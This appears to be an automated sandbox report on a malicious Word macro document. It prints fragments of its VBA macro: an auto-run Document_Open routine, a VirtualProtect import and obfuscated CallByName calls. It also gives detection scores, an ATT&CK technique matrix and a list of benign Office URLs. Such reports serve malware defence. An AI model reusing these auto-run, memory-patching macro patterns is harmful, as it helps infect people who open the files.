Source: Screenshot number: 12Screenshot OCR: Enable content". W L 'd"" - '0 - a" 4 At- B I y " " A, " ;Z 'tyles ,uaM "" " 30 words It? O
Source: berniesbooksdocument08.11.docOLE, VBA macro line: Private Declare PtrSafe Function Lib "kernel32" Alias "VirtualProtect" (ByVal As LongPtr, ByVal As LongPtr, ByVal As LongPtr, As LongPtr) As LongPtr
Source: berniesbooksdocument08.11.docOLE, VBA macro line: Set = CallByName((tzNBn4nTiI("GHnGK3YWsN_G")), tzNBn4nTiI("IHLLXTW2lF"), VbGet, tzNBn4nTiI("hjoQUX7"))
Source: berniesbooksdocument08.11.docOLE, VBA macro line: Set = CallByName((), tzNBn4nTiI("ZhcGI4Fko"), VbGet, )
Source: berniesbooksdocument08.11.docOLE, VBA macro line: Set = CallByName((), tzNBn4nTiI("UuJ8TNV_S"), VbGet, )
Source: ~DF94C757FE548F974F.TMP.0.drOLE, VBA macro line: Private Declare PtrSafe Function Lib "kernel32" Alias "VirtualProtect" (ByVal As LongPtr, ByVal As LongPtr, ByVal As LongPtr, As LongPtr) As LongPtr
Source: ~DF94C757FE548F974F.TMP.0.drOLE, VBA macro line: Set = CallByName((tzNBn4nTiI("GHnGK3YWsN_G")), tzNBn4nTiI("IHLLXTW2lF"), VbGet, tzNBn4nTiI("hjoQUX7"))
Source: ~DF94C757FE548F974F.TMP.0.drOLE, VBA macro line: Set = CallByName((), tzNBn4nTiI("ZhcGI4Fko"), VbGet, )
Source: ~DF94C757FE548F974F.TMP.0.drOLE, VBA macro line: Set = CallByName((), tzNBn4nTiI("UuJ8TNV_S"), VbGet, )
Source: berniesbooksdocument08.11.docOLE, VBA macro line: Private Sub Document_Open()
Source: ~DF94C757FE548F974F.TMP.0.drOLE, VBA macro line: Private Sub Document_Open()
Source: berniesbooksdocument08.11.docOLE indicator, VBA macros: true
Source: ~DF94C757FE548F974F.TMP.0.drOLE indicator, VBA macros: true
Source: ~DF94C757FE548F974F.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: berniesbooksdocument08.11.docVirustotal: Detection: 25%
Source: berniesbooksdocument08.11.docReversingLabs: Detection: 15%
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: berniesbooksdocument08.11.doc.LNK.0.drLNK file: ..\..\..\..\..\Desktop\berniesbooksdocument08.11.doc
Source: berniesbooksdocument08.11.docOLE indicator, Word Document stream: true
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{4B16FC83-2BBA-44CE-98AA-0703C2A242EA} - OProcSessId.datJump to behavior
Source: classification engineClassification label: mal68.expl.winDOC@1/11@0/1
Source: berniesbooksdocument08.11.docOLE document summary: title field not present or empty
Source: berniesbooksdocument08.11.docOLE document summary: author field not present or empty
Source: berniesbooksdocument08.11.docOLE document summary: edited time not present or 0
Source: ~DF94C757FE548F974F.TMP.0.drOLE document summary: title field not present or empty
Source: ~DF94C757FE548F974F.TMP.0.drOLE document summary: author field not present or empty
Source: ~DF94C757FE548F974F.TMP.0.drOLE document summary: edited time not present or 0
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: berniesbooksdocument08.11.docInitial sample: OLE zip file path = docProps/custom.xml
Source: berniesbooksdocument08.11.docStatic file information: File size 2298836 > 1048576
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts12
Scripting
Path InterceptionPath Interception1
Masquerading
OS Credential Dumping1
File and Directory Discovery
Remote ServicesData from Local SystemExfiltration Over Other Network MediumData ObfuscationEavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts11
Exploitation for Client Execution
Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Disable or Modify Tools
LSASS Memory2
System Information Discovery
Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)12
Scripting
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
berniesbooksdocument08.11.doc25%VirustotalBrowse
berniesbooksdocument08.11.doc15%ReversingLabsScript-Macro.Trojan.Amphitryon
berniesbooksdocument08.11.doc100%Joe Sandbox ML
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\~DF94C757FE548F974F.TMP100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://roaming.edog.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%URL Reputationsafe
https://my.microsoftpersonalcontent.com0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://api.aadrm.com0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.com9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
    high
    https://login.microsoftonline.com/9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
      high
      https://shell.suite.office.com:14439776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
        high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
          high
          https://autodiscover-s.outlook.com/9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
            high
            https://roaming.edog.9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
            • URL Reputation: safe
            unknown
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
              high
              https://cdn.entity.9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/query9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                high
                https://clients.config.office.net/user/v1.0/tenantassociationkey9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                    high
                    https://powerlift.acompli.net9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.com9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v19776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                      high
                      https://cortana.ai9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspx9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.com9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                high
                                https://api.aadrm.com/9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                • URL Reputation: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                      high
                                      https://cr.office.com9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                        high
                                        https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                        • Avira URL Cloud: safe
                                        low
                                        https://portal.office.com/account/?ref=ClientMeControl9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                          high
                                          https://graph.ppe.windows.net9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                            high
                                            https://res.getmicrosoftkey.com/api/redemptionevents9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://powerlift-frontdesk.acompli.net9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://tasks.office.com9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                              high
                                              https://officeci.azurewebsites.net/api/9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://sr.outlook.office.net/ws/speech/recognize/assistant/work9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                high
                                                https://my.microsoftpersonalcontent.com9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://store.office.cn/addinstemplate9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://api.aadrm.com9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://outlook.office.com/autosuggest/api/v1/init?cvid=9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                  high
                                                  https://globaldisco.crm.dynamics.com9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                    high
                                                    https://messaging.engagement.office.com/9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                        high
                                                        https://dev0-api.acompli.net/autodetect9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.ms9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.diagnosticssdf.office.com/v2/feedback9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                          high
                                                          https://api.powerbi.com/v1.0/myorg/groups9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                            high
                                                            https://web.microsoftstream.com/video/9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                              high
                                                              https://api.addins.store.officeppe.com/addinstemplate9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://graph.windows.net9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                high
                                                                https://dataservice.o365filtering.com/9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://officesetup.getmicrosoftkey.com9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://analysis.windows.net/powerbi/api9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                  high
                                                                  https://prod-global-autodetect.acompli.net/autodetect9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://outlook.office365.com/autodiscover/autodiscover.json9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                    high
                                                                    https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                      high
                                                                      https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                        high
                                                                        https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                          high
                                                                          https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                            high
                                                                            https://ncus.contentsync.9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                              high
                                                                              https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                                high
                                                                                http://weather.service.msn.com/data.aspx9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                                  high
                                                                                  https://apis.live.net/v5.0/9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                                    high
                                                                                    https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                                      high
                                                                                      https://messaging.lifecycle.office.com/9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                                        high
                                                                                        https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                                          high
                                                                                          https://management.azure.com9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                                            high
                                                                                            https://outlook.office365.com9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                                              high
                                                                                              https://wus2.contentsync.9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://incidents.diagnostics.office.com9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                                                high
                                                                                                https://clients.config.office.net/user/v1.0/ios9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                                                  high
                                                                                                  https://insertmedia.bing.office.net/odc/insertmedia9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                                                    high
                                                                                                    https://o365auditrealtimeingestion.manage.office.com9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                                                      high
                                                                                                      https://outlook.office365.com/api/v1.0/me/Activities9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                                                        high
                                                                                                        https://api.office.net9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                                                          high
                                                                                                          https://incidents.diagnosticssdf.office.com9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                                                            high
                                                                                                            https://asgsmsproxyapi.azurewebsites.net/9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            https://clients.config.office.net/user/v1.0/android/policies9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                                                              high
                                                                                                              https://entitlement.diagnostics.office.com9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                                                                high
                                                                                                                https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                                                                  high
                                                                                                                  https://substrate.office.com/search/api/v2/init9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                                                                    high
                                                                                                                    https://outlook.office.com/9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                                                                      high
                                                                                                                      https://storage.live.com/clientlogs/uploadlocation9776AE02-6E66-4695-8702-04ED8D3C50EB.0.drfalse
                                                                                                                        high
